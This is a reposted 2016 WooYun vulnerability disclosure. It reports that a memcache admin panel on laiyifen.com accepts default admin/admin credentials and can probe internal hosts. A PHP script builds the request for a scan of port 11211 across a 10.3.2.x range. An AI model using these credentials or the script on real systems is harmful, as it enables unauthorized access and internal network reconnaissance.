来伊份主站memcache未授权访问可探测内网（附测试脚本）

2017年5月2日19:41:18评论467 views字数 227阅读0分45秒阅读模式

摘要

2016-03-10：细节已通知厂商并且等待厂商处理中
2016-03-11：厂商已经确认，细节仅向厂商公开
2016-03-21：细节向核心白帽子及相关领域专家公开
2016-03-31：细节向普通白帽子公开
2016-04-10：细节向实习白帽子公开
2016-04-25：细节向公众公开

漏洞概要关注数(46) 关注此漏洞

缺陷编号： WooYun-2016-183041

漏洞标题：来伊份主站memcache未授权访问可探测内网（附测试脚本）

漏洞作者：镱鍚

提交时间： 2016-03-10 17:35

公开时间： 2016-04-25 10:04

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：未授权访问

7人收藏

漏洞详情

披露状态：

简要描述：

看来伊份这么多洞上首页，我也来一份!^_^

详细说明：

URL:

code 区域

http://www.laiyifen.com/memadmin/index.php

来一份主站，memcache管理后台

admin admin 成功登陆

这里可以添加内网IP，从而探测内网主机存活状态

经过前人思路指点，加上抓包流量分析，点击开始管理，抓包

在经过url解码，即可找出规律。

这里利用10.3.2.X这个网段来测试，shell脚本不会，就自己写了个php的，将所有的c段添加到管理，成功

最后就简单了，遍历num参数爆破，成功探测到一台主机

相信你们内网不止这一台memcache服务器，这里证明即可，就难得去一一探测了。危害你们更懂。。

利用脚本

code 区域

<?php
  $str1='data[0][con][0][num]=255&';
 
  $str3='data[1][conp][0][num]=0';
  
  for($i=0;$i<255;$i++){
   $str2='data[0][con][0][cons]['.$i.'][name]=n'.$i.'&data[0][con][0][cons]['.$i.'][host]=10.3.2.'.$i.'&data[0][con][0][cons]['.$i.'][port]=11211&data[0][con][0][cons]['.$i.'][ispcon]=0&data[0][con][0][cons]['.$i.'][timeout]=1&';
   $str1.=$str2;
  }
  
  $str1.=$str3;
  
  echo $str1;
 ?>

写的太菜，大牛勿喷。。

漏洞证明：

URL:

code 区域

http://www.laiyifen.com/memadmin/index.php

来一份主站，memcache管理后台

admin admin 成功登陆

这里可以添加内网IP，从而探测内网主机存活状态

经过前人思路指点，加上抓包流量分析，点击开始管理，抓包

在经过url解码，即可找出规律。

这里利用10.3.2.X这个网段来测试，shell脚本不会，就自己写了个php的，将所有的c段添加到管理，成功

最后就简单了，遍历num参数爆破，成功探测到一台主机

相信你们内网不止这一台memcache服务器，这里证明即可，就难得去一一探测了。危害你们更懂。。

利用脚本

code 区域

<?php
  $str1='data[0][con][0][num]=255&';
 
  $str3='data[1][conp][0][num]=0';
  
  for($i=0;$i<255;$i++){
   $str2='data[0][con][0][cons]['.$i.'][name]=n'.$i.'&data[0][con][0][cons]['.$i.'][host]=10.3.2.'.$i.'&data[0][con][0][cons]['.$i.'][port]=11211&data[0][con][0][cons]['.$i.'][ispcon]=0&data[0][con][0][cons]['.$i.'][timeout]=1&';
   $str1.=$str2;
  }
  
  $str1.=$str3;
  
  echo $str1;
 ?>

写的太菜，大牛勿喷。。

修复方案：

限制访问

版权声明：转载请注明来源镱鍚@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2016-03-11 10:04

厂商回复：

谢谢大家的支持，我们尽快修复，非常感谢！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-10 17:36 | 爱上平顶山 ( 核心白帽子 | Rank:3144 漏洞数:625 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

2

这个有意思

1# 回复此人
2016-03-10 17:38 | 牛小帅 ( 普通白帽子 | Rank:1597 漏洞数:386 | bye)

1

@爱上平顶山确实呀那个脚本写的有点意思

2# 回复此人
2016-03-10 17:48 | 镱鍚 ( 普通白帽子 | Rank:302 漏洞数:42 | 执手岁月留香，唱曲往事飞扬...)

1

@爱上平顶山 @ 牛小帅大牛们，求不喷

3# 回复此人
2016-03-10 17:57 | he1renyagao ( 普通白帽子 | Rank:235 漏洞数:31 | 是金子总会发光，在还未发光之前，先磨磨)

1

来学学 memcache 怎么探测内网，之前遇到过，只是一些信息泄露。

4# 回复此人
2016-03-10 18:05 | sauce ( 普通白帽子 | Rank:285 漏洞数:46 | 面向人民币编程)

1

每天来来伊份

5# 回复此人
2016-03-10 18:09 | 小川 ( 核心白帽子 | Rank:1627 漏洞数:241 | 一个致力要将乌云变成搞笑论坛的男人)

1

memcache里竟然有这样的地址

6# 回复此人
2016-03-10 18:20 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向，哪怕前路迷茫；抱着最大的...)

1

我是来看脚本的

7# 回复此人
2016-03-10 18:24 | 镱鍚 ( 普通白帽子 | Rank:302 漏洞数:42 | 执手岁月留香，唱曲往事飞扬...)

1

@he1renyagao 其实就是信息泄露，标题党罢了

8# 回复此人
2016-03-10 18:30 | ShAdow丶 ( 普通白帽子 | Rank:121 漏洞数:19 )

1

这个脚本确实有意思哈哈

9# 回复此人
2016-03-10 19:27 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

1

memcache未授权访问可探测内网？来学姿势。

10# 回复此人
2016-03-10 19:37 | 镱鍚 ( 普通白帽子 | Rank:302 漏洞数:42 | 执手岁月留香，唱曲往事飞扬...)

1

@_Thorns 大牛见笑了，并不能探测内网，只能判断下内网memcache服务器的存活状态罢了

11# 回复此人
2016-03-10 21:26 | Dleo ( 普通白帽子 | Rank:194 漏洞数:48 | talent)

1

@镱鍚大牛别忘了带小弟飞

12# 回复此人

漏洞概要 关注数(46) 关注此漏洞

缺陷编号： WooYun-2016-183041

漏洞标题： 来伊份主站memcache未授权访问可探测内网（附测试脚本）

相关厂商： laiyifen.com

漏洞作者： 镱鍚

提交时间： 2016-03-10 17:35

公开时间： 2016-04-25 10:04

漏洞类型： 未授权访问/权限绕过

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 未授权访问

7人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 镱鍚@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(46) 关注此漏洞

漏洞标题：来伊份主站memcache未授权访问可探测内网（附测试脚本）

漏洞作者：镱鍚

漏洞类型：未授权访问/权限绕过

危害等级：高

漏洞状态：厂商已经确认

Tags标签：未授权访问

版权声明：转载请注明来源镱鍚@乌云

漏洞评价(共0人评价):

登陆后才能进行评分